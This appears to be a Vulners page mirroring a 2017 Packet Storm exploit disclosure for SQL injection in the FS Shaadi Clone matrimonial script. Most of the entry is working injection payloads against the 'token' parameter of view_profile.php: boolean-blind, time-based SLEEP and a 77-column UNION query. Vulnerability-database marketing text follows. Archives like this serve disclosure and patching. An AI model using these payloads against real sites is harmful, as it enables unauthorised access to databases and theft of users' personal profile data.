Lucene search
K

FS Shaadi Clone SQL Injection

🗓️ 06 Dec 2017 00:00:00Reported by DanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

FS Shaadi Clone SQL Injection 2017-12-0

Code
`# Exploit Title: FS Shaadi Clone - SQL Injection  
# Date: 2017-12-05  
# Exploit Author: DanAdeg  
# Vendor Homepage: https://fortunescripts.com/  
# Software Link: https://fortunescripts.com/product/shaadi-clone/  
# Version: 2017-12-05  
# Tested on: Kali Linux 2.0  
  
(PoC):  
SQL Injection on GET parameter = token  
http://localhost/view_profile.php?token=  
  
---  
Parameter: token (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND 9253=9253--  
Eqjw  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND SLEEP(5)-- aVZf  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 77 columns  
Payload: token=-5886' UNION ALL SELECT  
NULL,CONCAT(0x7162787171,0x6153755a46504d6a546578714d765a594a5359556c414f4d736c45444958686e4455564770526272,0x7170787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--  
nVKG  
---  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation